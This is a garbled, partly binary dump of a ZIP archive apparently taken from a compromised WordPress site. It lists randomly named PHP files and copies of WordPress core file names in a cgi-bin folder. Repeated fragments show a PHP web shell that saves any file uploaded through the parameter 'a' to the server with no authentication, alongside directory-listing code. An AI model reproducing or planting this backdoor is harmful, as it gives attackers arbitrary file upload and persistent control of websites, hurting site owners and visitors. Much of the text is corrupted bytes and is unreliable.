"; } ?> PKᮄYˆ®s"(( uwcvvcwn.phpnu„[µü¤
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
";?> > $file "; } } closedir($handle); } } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?> PKᮄYˆ®s"(( cyyffmqv.phpnu„[µü¤
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
";?> > $file "; } } closedir($handle); } } ?>
";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"
"; } ?> PKᮄY Êi(mmcgi-bin/wp-blog-header.phpnuÏÃ6Ç$PKᮄY Êi(mm·cgi-bin/wp-cron.phpnu„[µü¤PKᮄYÙͥ¤ÅÅgcgi-bin/.htaccessnuÏÃ6Ç$PKᮄYÙͥ¤ÅÅ m.htaccessnuÏÃ6Ç$PKᮄYýZY ÉÉkmoon.phpnu„[µü¤PKᮄY&«Ÿ´âDâD ladmin.phpnu„[µü¤PKᮄYò›[³Í Í ‡[wp-blog-header.phpnu„[µü¤PKᮄYò›[³Í Í –ewp-cron.phpnu„[µü¤PKᮄY¤î�$QQ žocgi-bin.zipnu„[µü¤PKᮄYKÕ-Ê Ê *�y.phpnu„[µü¤PKᮄYídé8é8 )�indec.phpnu„[µü¤PKᮄY*R¶¿XX KÈjtzuhiwx.phpnu„[µü¤PKᮄYˆ®s"(( ßÍuwcvvcwn.phpnu„[µü¤PKᮄYˆ®s"(( CÒcyyffmqv.phpnu„[µü¤PK2§Ö